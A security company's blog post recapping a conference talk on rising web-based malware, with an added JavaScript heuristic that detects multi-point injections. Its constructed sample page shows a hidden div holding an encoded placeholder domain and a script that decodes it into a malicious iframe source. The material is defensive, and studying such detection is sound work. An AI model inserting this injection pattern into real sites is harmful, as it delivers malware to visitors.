Late last week I gave a talk at the Cyber Security East Conference in Washington, DC. Some of the other speakers included Robert Lentz (Deputy Assistant Secretary of Defense), Dr. Eric Cole (Chief Scientist of Lockheed Martin), and Robert Carey (Chief Information Officer, Department of the Navy). There was a lot of interesting and useful discussion, and I was glad to be able to contribute to the event.
In my talk, I reviewed the fundamental shift we've seen in the way malware is spreading, focusing on the 600% increase in web-based malware in the last two years. These attacks -- in which legitimate sites are compromised and turned into delivery vehicles for malware -- are impacting more than a million webpages per month, and in turn more and more legitimate sites are being blacklisted by major search engines, browsers, and AV companies.
I also shared a few examples of how web-based malware attacks are growing more sophisticated, based on data we've gathered in the last year using our proprietary malware analysis platform. As you may know, some web-based malware attacks can be attributed to a single injection of an iFrame or JavaScript code snippet, with a relatively obvious malicious domain in the SRC of the iFrame. Others employ heavily obfuscated JavaScript that can often be hundreds of characters long, and as such can be more difficult to spot or remove from an infected site -- but they still use a single injection point.
We are now starting to see attackers insert code via multiple injection points, to further obfuscate the bad code and make it more difficult for webmasters and traditional scans to detect. The screenshot below shows an example of this kind of attack, which I presented last week:
Note that the attacker has injected JavaScript here, but it is not obfuscated, and it doesn't appear to point to a malicious domain. Hence, anyone who does a simple check for malicious domains may be easily fooled into thinking that the JavaScript is innocuous. The reality is quite different: the call to "getElementById" in the JavaScript reaches into another part of the document (where the first injection took place) to retrieve and decode the malicious domain. Once the domain is decoded (in the second injection), the attacker's domain is revealed to be the source of a malicious iFrame.
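As an added illustration (not code from the original post or from Dasient), here is a small static heuristic in Node.js that flags the pattern just described: a script that builds an iFrame from the contents of an element it fetches with getElementById, where that element holds an opaque, encoded-looking blob. The sample page, the element ids and the hex placeholder are all constructed for this example.

```javascript
// Added example, not code from the original post or from Dasient: a static
// heuristic for the multi-injection pattern above, where one injected element
// carries an encoded domain and a separate, innocent-looking script reads it
// back via getElementById to build an iframe.

const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
const GET_BY_ID_RE = /getElementById\(\s*['"]([^'"]+)['"]\s*\)/g;
const IFRAME_HINT_RE = /createElement\(\s*['"]iframe['"]\s*\)|<iframe\b/i;

// Inner text of the first element whose id attribute equals `id`, or null.
function elementTextById(html, id) {
  const safeId = id.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
  const re = new RegExp(
    `<([a-z0-9]+)\\b[^>]*\\sid=["']${safeId}["'][^>]*>([\\s\\S]*?)<\\/\\1>`, 'i');
  const m = re.exec(html);
  return m ? m[2].trim() : null;
}

// Opaque blob rather than prose or a plain URL: one long token, no whitespace.
function looksEncoded(text) {
  return text.length >= 16 && !/\s/.test(text) && !/^https?:\/\//i.test(text);
}

// One finding per script that builds an iframe from an element whose content
// looks encoded; scripts that construct no iframe are ignored.
function scanForDomLinkedInjection(html) {
  const findings = [];
  for (const [, body] of html.matchAll(SCRIPT_RE)) {
    if (!IFRAME_HINT_RE.test(body)) continue;
    for (const [, id] of body.matchAll(GET_BY_ID_RE)) {
      const carrier = elementTextById(html, id);
      if (carrier !== null && looksEncoded(carrier)) {
        findings.push({ id, carrier, reason: 'iframe src derived from encoded DOM content' });
      }
    }
  }
  return findings;
}

// Constructed sample page: the first injection is a hidden div holding a hex
// placeholder (not a real domain); the second is an unobfuscated script that
// reads it back (decodeHex stands in for the attacker's decoder). The last
// script is a benign control that must not be flagged.
const SAMPLE_HTML = `<html><body><p>Welcome.</p>
<div id="cfg" style="display:none">6d616c776172652d706c616365686f6c6465722e696e76616c6964</div>
<script>var d = document.getElementById('cfg').innerHTML;
var f = document.createElement('iframe'); f.src = 'http://' + decodeHex(d) + '/';
document.body.appendChild(f);</script>
<script>document.title = document.getElementById('title').innerHTML;</script>
<h1 id="title">News</h1></body></html>`;

console.log(scanForDomLinkedInjection(SAMPLE_HTML));
```

The heuristic only reports the structural link between the two injection points; it does not need to know the encoding, which is the point of looking at behaviour rather than a blacklist of domains.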
This new attack makes it clear that the purveyors of web-based malware are actively looking for ways around malware scans, and it underlines the importance of going above and beyond signature-based analysis in the battle against this threat. For example, the Dasient WAM malware-analysis platform was able to proactively capture this new multiple-injection attack in no small part because of its strengths in behavioral analysis. We believe that as the web becomes more sophisticated and as attackers continue to embrace new, increasingly automated attack vectors, businesses on the web will need to deploy protections that work at web speed and web scale to keep themselves safe.